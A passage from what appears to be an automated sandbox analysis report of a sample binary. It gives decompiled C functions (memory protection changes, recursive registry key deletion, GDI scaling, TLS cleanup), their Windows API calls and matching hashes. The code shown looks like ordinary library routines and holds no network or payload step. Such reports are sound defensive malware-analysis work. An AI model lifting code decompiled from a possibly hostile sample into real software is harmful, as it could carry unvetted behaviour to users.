											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x45a3f0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}




















                                                                              0x00412ac9
                                                                              0x00412aca
                                                                              0x00412acf
                                                                              0x00412ae0
                                                                              0x00412b59
                                                                              0x00412b59
                                                                              0x00412ae2
                                                                              0x00412ae2
                                                                              0x00412ae9
                                                                              0x00412aef
                                                                              0x00412af2
                                                                              0x00412afe
                                                                              0x00412b05
                                                                              0x00412b10
                                                                              0x00412b14
                                                                              0x00412b17
                                                                              0x00000000
                                                                              0x00412b19
                                                                              0x00412b1c
                                                                              0x00412b7a
                                                                              0x00000000
                                                                              0x00412b1e
                                                                              0x00412b1e
                                                                              0x00412b26
                                                                              0x00412b3c
                                                                              0x00412b42
                                                                              0x00000000
                                                                              0x00412b44
                                                                              0x00412b48
                                                                              0x00412b4b
                                                                              0x00412b4e
                                                                              0x00412b57
                                                                              0x00412b5f
                                                                              0x00412b61
                                                                              0x00412b61
                                                                              0x00412b6d
                                                                              0x00412b73
                                                                              0x00412b7d
                                                                              0x00412b80
                                                                              0x00412b93
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00412b50
                                                                              0x00412b52
                                                                              0x00412b52
                                                                              0x00412b4e
                                                                              0x00000000
                                                                              0x00412b42
                                                                              0x00000000
                                                                              0x00412b26
                                                                              0x00412b1c
                                                                              0x00412b17
                                                                              0x00412b99
                                                                              0x00412ba0

                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00412B6D
                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00412B93
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                              • String ID:
                                                                              • API String ID: 4136887677-0
                                                                              • Opcode ID: 24b56995ca49bf355e2cb5cc3bdc514839b2c42c370d55998e18faebaea88396
                                                                              • Instruction ID: 6821be03d93957d4a86eb00c23eda80211210b287ceef23d4a63bb871c2732e5
                                                                              • Opcode Fuzzy Hash: 24b56995ca49bf355e2cb5cc3bdc514839b2c42c370d55998e18faebaea88396
                                                                              • Instruction Fuzzy Hash: 5731D772D0421AEBCF10CFA4DE44AED7BB8EB04354F140166E901E7290D7B8AE95DB98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C9C9, Relevance: 7.6, APIs: 5, Instructions: 70registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0042C9C9(void* __edx) {
				intOrPtr _t28;
				signed int _t31;
				signed int _t35;
				signed int _t44;
				void* _t52;
				void* _t58;
				void* _t60;

				_t52 = __edx;
				E004128A0(E00430D2F, _t58);
				_t28 =  *0x457184; // 0xc72e1596
				_push(_t44);
				 *((intOrPtr*)(_t58 - 0x14)) = _t28;
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x11c;
				_t31 = RegOpenKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)), _t58 - 0x124);
				_t56 = _t31;
				if(_t31 == 0) {
					while(1) {
						_t35 = RegEnumKeyA( *(_t58 - 0x124), 0, _t58 - 0x11c, 0x104);
						_t56 = _t35;
						_t64 = _t56;
						if(_t56 != 0) {
							break;
						}
						 *(_t58 - 4) =  *(_t58 - 4) & _t35;
						_push(_t58 - 0x11c);
						E0040830B(_t58 - 0x120, _t64);
						 *(_t58 - 4) = 1;
						_t56 = E0042C9C9(_t52,  *(_t58 - 0x124), _t58 - 0x120);
						_t44 = _t44 & 0xffffff00 | _t56 != 0x00000000;
						 *(_t58 - 4) = 0;
						E00401000( *((intOrPtr*)(_t58 - 0x120)) + 0xfffffff0, _t52);
						if(_t44 == 0) {
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t56 - 0x103;
					if(_t56 == 0x103) {
						L6:
						_t56 = RegDeleteKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)));
					} else {
						__eflags = _t56 - 0x3f2;
						if(_t56 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t58 - 0x124));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return E00412FBB(_t56,  *((intOrPtr*)(_t58 - 0x14)));
			}










                                                                              0x0042c9c9
                                                                              0x0042c9ce
                                                                              0x0042c9d9
                                                                              0x0042c9de
                                                                              0x0042c9e1
                                                                              0x0042c9e9
                                                                              0x0042c9f7
                                                                              0x0042c9fd
                                                                              0x0042ca01
                                                                              0x0042ca07
                                                                              0x0042ca1b
                                                                              0x0042ca21
                                                                              0x0042ca23
                                                                              0x0042ca25
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042ca27
                                                                              0x0042ca30
                                                                              0x0042ca37
                                                                              0x0042ca49
                                                                              0x0042ca58
                                                                              0x0042ca5c
                                                                              0x0042ca62
                                                                              0x0042ca66
                                                                              0x0042ca6d
                                                                              0x0042ca6f
                                                                              0x00000000
                                                                              0x0042ca6f
                                                                              0x00000000
                                                                              0x0042ca6d
                                                                              0x0042ca96
                                                                              0x0042ca9c
                                                                              0x0042caa6
                                                                              0x0042cab4
                                                                              0x0042ca9e
                                                                              0x0042ca9e
                                                                              0x0042caa4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042caa4
                                                                              0x0042cabc
                                                                              0x0042cabc
                                                                              0x0042cac5
                                                                              0x0042cada

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042C9CE
                                                                              • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0042C9F7
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0042CA1B
                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 0042CAAE
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042CABC
                                                                                • Part of subcall function 0040830B: __EH_prolog.LIBCMT ref: 00408310
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$CloseDeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 4272528234-0
                                                                              • Opcode ID: ea3102a754cbb4f436e45ae9952828ddea18e0d880143fb550b3eccd330439cc
                                                                              • Instruction ID: 7e0fe8125565379c0bf65bc04c102845f328d09770fc18c8dd8b5e8b98c4dc10
                                                                              • Opcode Fuzzy Hash: ea3102a754cbb4f436e45ae9952828ddea18e0d880143fb550b3eccd330439cc
                                                                              • Instruction Fuzzy Hash: F6219C32A00128AFDB26DB58DD41BEDB7B4EF08310F0042A6FD55A73A0D7349E54DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C13C, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E0042C13C(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x45a328; // 0x60
					_t12 =  *0x45a32c; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0042A641(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                              0x0042c13f
                                                                              0x0042c142
                                                                              0x0042c147
                                                                              0x0042c193
                                                                              0x0042c199
                                                                              0x00000000
                                                                              0x0042c149
                                                                              0x0042c152
                                                                              0x0042c157
                                                                              0x0042c18d
                                                                              0x0042c18f
                                                                              0x0042c19e
                                                                              0x0042c19e
                                                                              0x0042c1b0
                                                                              0x0042c1b8
                                                                              0x0042c1be
                                                                              0x0042c1c0
                                                                              0x0042c15e
                                                                              0x0042c160
                                                                              0x0042c164
                                                                              0x0042c16c
                                                                              0x0042c173
                                                                              0x0042c176
                                                                              0x0042c176
                                                                              0x0042c157
                                                                              0x0042c1c7

                                                                              APIs
                                                                              • GetMapMode.GDI32(?,?,?,?,?,?,0040B55B,?,00000000,?,77428B90), ref: 0042C14C
                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 0042C186
                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0042C18F
                                                                                • Part of subcall function 0042A641: MulDiv.KERNEL32(?,00000000,00000000), ref: 0042A681
                                                                                • Part of subcall function 0042A641: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 0042A69E
                                                                              • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0042C1B3
                                                                              • MulDiv.KERNEL32(00000000,000009EC,77428B90), ref: 0042C1BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Mode
                                                                              • String ID:
                                                                              • API String ID: 696222070-0
                                                                              • Opcode ID: be2b5c892061feed72e34d03a9d984e4263a552dacb235a28b2c5ed3044dd559
                                                                              • Instruction ID: 9d8b3eaab7cd4ab2724f394bc59ee48c58965b9ad0b664f9d76e0a227043b165
                                                                              • Opcode Fuzzy Hash: be2b5c892061feed72e34d03a9d984e4263a552dacb235a28b2c5ed3044dd559
                                                                              • Instruction Fuzzy Hash: 3C110231700610AFCB215F55DC85C2EBBE9EF88710751442AFA8557321C774AC11CF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C1CA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E0042C1CA(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x45a328; // 0x60
					_t12 =  *0x45a32c; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0042A5D8(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                              0x0042c1cd
                                                                              0x0042c1d0
                                                                              0x0042c1d5
                                                                              0x0042c221
                                                                              0x0042c227
                                                                              0x00000000
                                                                              0x0042c1d7
                                                                              0x0042c1e0
                                                                              0x0042c1e5
                                                                              0x0042c21b
                                                                              0x0042c21d
                                                                              0x0042c22c
                                                                              0x0042c22c
                                                                              0x0042c23e
                                                                              0x0042c247
                                                                              0x0042c249
                                                                              0x0042c24c
                                                                              0x0042c24e
                                                                              0x0042c1ec
                                                                              0x0042c1ee
                                                                              0x0042c1f2
                                                                              0x0042c1fa
                                                                              0x0042c201
                                                                              0x0042c204
                                                                              0x0042c204
                                                                              0x0042c1e5
                                                                              0x0042c255

                                                                              APIs
                                                                              • GetMapMode.GDI32(?,00000000,?,?,?,?,0040B58F,?), ref: 0042C1DA
                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 0042C214
                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0042C21D
                                                                                • Part of subcall function 0042A5D8: MulDiv.KERNEL32(0040B58F,00000000,00000000), ref: 0042A618
                                                                                • Part of subcall function 0042A5D8: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042A635
                                                                              • MulDiv.KERNEL32(0040B58F,00000060,000009EC), ref: 0042C241
                                                                              • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 0042C24C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Mode
                                                                              • String ID:
                                                                              • API String ID: 696222070-0
                                                                              • Opcode ID: 8ef3bd53c58bb249016fa41b6fd00017a64e29215942d97927a4d66e0e98c08f
                                                                              • Instruction ID: 34d886f5a19aac8f01081610a21fa3fd08f0252832cf54ca366151a787dea025
                                                                              • Opcode Fuzzy Hash: 8ef3bd53c58bb249016fa41b6fd00017a64e29215942d97927a4d66e0e98c08f
                                                                              • Instruction Fuzzy Hash: 3811A031700614EFDB215F95EC84C1EBBE9EF98764751442AE94267360CB75EC01CF69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416254, Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E00416254(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x45a5b4( *0x457710);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E004146EA(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E00412D15(0x10);
					} else {
						_push(_t17);
						_push( *0x457710);
						if( *0x45a5b8() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x4577b8;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}









                                                                              0x00416256
                                                                              0x00416262
                                                                              0x0041626a
                                                                              0x0041626c
                                                                              0x0041626e
                                                                              0x00416270
                                                                              0x00416275
                                                                              0x0041627c
                                                                              0x00416282
                                                                              0x004162b1
                                                                              0x004162b3
                                                                              0x00416284
                                                                              0x00416284
                                                                              0x00416285
                                                                              0x00416293
                                                                              0x00000000
                                                                              0x00416295
                                                                              0x00416295
                                                                              0x0041629c
                                                                              0x004162a3
                                                                              0x004162a9
                                                                              0x004162ad
                                                                              0x004162ad
                                                                              0x00416293
                                                                              0x00416282
                                                                              0x004162ba
                                                                              0x004162c4

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000000,004141FF,004148BA,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010,004164BE), ref: 00416256
                                                                              • FlsGetValue.KERNEL32(?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00416264
                                                                              • SetLastError.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 004162BA
                                                                                • Part of subcall function 004146EA: __lock.LIBCMT ref: 0041472E
                                                                                • Part of subcall function 004146EA: RtlAllocateHeap.NTDLL(00000008,?,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041476C
                                                                              • FlsSetValue.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041628B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004162A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                              • String ID:
                                                                              • API String ID: 1487844433-0
                                                                              • Opcode ID: c49a3505c5db225755bb3125becdb6cce9c646128e876951c891abf90fb330a4
                                                                              • Instruction ID: 9dae019a1d6f26c51402996a51035ce9e85c34501d1d41308d0e853f0881105a
                                                                              • Opcode Fuzzy Hash: c49a3505c5db225755bb3125becdb6cce9c646128e876951c891abf90fb330a4
                                                                              • Instruction Fuzzy Hash: 43F0F6316017119FD7302F60BC0DA873BA4EB047A3B100A79F952E62A1DBB8D84087EC
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E132, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042E132(long* __ecx) {
				long _t4;
				long _t5;
				void* _t6;
				void* _t13;
				long _t14;
				long* _t15;

				_t15 = __ecx;
				_t1 =  &(_t15[5]); // 0x5ae160
				_t4 =  *_t1;
				if(_t4 != 0) {
					do {
						_t14 =  *(_t4 + 4);
						E0042DF9A(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t3 =  &(_t15[4]); // 0x5a9030
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                                                                              0x0042e133
                                                                              0x0042e135
                                                                              0x0042e135
                                                                              0x0042e13b
                                                                              0x0042e13d
                                                                              0x0042e13d
                                                                              0x0042e145
                                                                              0x0042e14c
                                                                              0x0042e14c
                                                                              0x0042e13d
                                                                              0x0042e150
                                                                              0x0042e155
                                                                              0x0042e158
                                                                              0x0042e158
                                                                              0x0042e15e
                                                                              0x0042e15e
                                                                              0x0042e163
                                                                              0x0042e16c
                                                                              0x0042e16f
                                                                              0x0042e176
                                                                              0x0042e176
                                                                              0x0042e180
                                                                              0x0042e188

                                                                              APIs
                                                                              • TlsFree.KERNEL32(005AE160,?,?,0042E1A9,00000000,00000001), ref: 0042E158
                                                                              • GlobalHandle.KERNEL32(005A9030), ref: 0042E166
                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,0042E1A9,00000000,00000001), ref: 0042E16F
                                                                              • GlobalFree.KERNEL32 ref: 0042E176
                                                                              • DeleteCriticalSection.KERNEL32(0045A0BC,?,?,0042E1A9,00000000,00000001), ref: 0042E180
                                                                                • Part of subcall function 0042DF9A: EnterCriticalSection.KERNEL32(?), ref: 0042DFF7
                                                                                • Part of subcall function 0042DF9A: LeaveCriticalSection.KERNEL32(?,?), ref: 0042E007
                                                                                • Part of subcall function 0042DF9A: LocalFree.KERNEL32(?), ref: 0042E010
                                                                                • Part of subcall function 0042DF9A: TlsSetValue.KERNEL32(?,00000000), ref: 0042E022
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                              • String ID:
                                                                              • API String ID: 1549993015-0
                                                                              • Opcode ID: a880416ccc740a60decd58c0d2ac5b52bd6ff4a99c811f2b5f2dffebbd3a1150
                                                                              • Instruction ID: d7330e3687ae5cd428cb32ec7f4b1f62cbc295cce9f61219142c3d003bfa858e
                                                                              • Opcode Fuzzy Hash: a880416ccc740a60decd58c0d2ac5b52bd6ff4a99c811f2b5f2dffebbd3a1150
                                                                              • Instruction Fuzzy Hash: 16F0E2313002209BC621AB39BE08A7B77BDAF897207560529F915C33A0CBB8DC02876C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418520, Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00418520() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x457184; // 0xc72e1596
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x457184 = _t22;
					if(_t22 == 0) {
						 *0x457184 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}












                                                                              0x00418526
                                                                              0x0041852d
                                                                              0x0041853b
                                                                              0x00418547
                                                                              0x0041854f
                                                                              0x00418557
                                                                              0x00418563
                                                                              0x0041856c
                                                                              0x0041856f
                                                                              0x00418571
                                                                              0x00418577
                                                                              0x00418579
                                                                              0x00418579
                                                                              0x00000000
                                                                              0x00418583
                                                                              0x00418585

                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041853B
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418547
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041854F
                                                                              • GetTickCount.KERNEL32 ref: 00418557
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00418563
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                              • String ID:
                                                                              • API String ID: 1445889803-0
                                                                              • Opcode ID: a8da04e51018533badeaf7116519ce99b09b31bc1189681f021e828040a29251
                                                                              • Instruction ID: cd8a03b86fe6545635f6655c9ee535c1cb9f5b8208012e5efd043c1a9a1715ec
                                                                              • Opcode Fuzzy Hash: a8da04e51018533badeaf7116519ce99b09b31bc1189681f021e828040a29251
                                                                              • Instruction Fuzzy Hash: F7F0F972C00218ABCF209FB4EF4859FB7F8FB082417860975DD11F7211EA74EA408A98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040F4FE, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E0040F4FE(intOrPtr* __ecx) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E004128A0(E004311C2, _t263);
				_t130 =  *0x457184; // 0xc72e1596
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x44ddbc);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E0040C567(_t263 - 0x70, 0x44e4d8);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E0040C567(_t263 - 0x40, 0x44e4c0);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
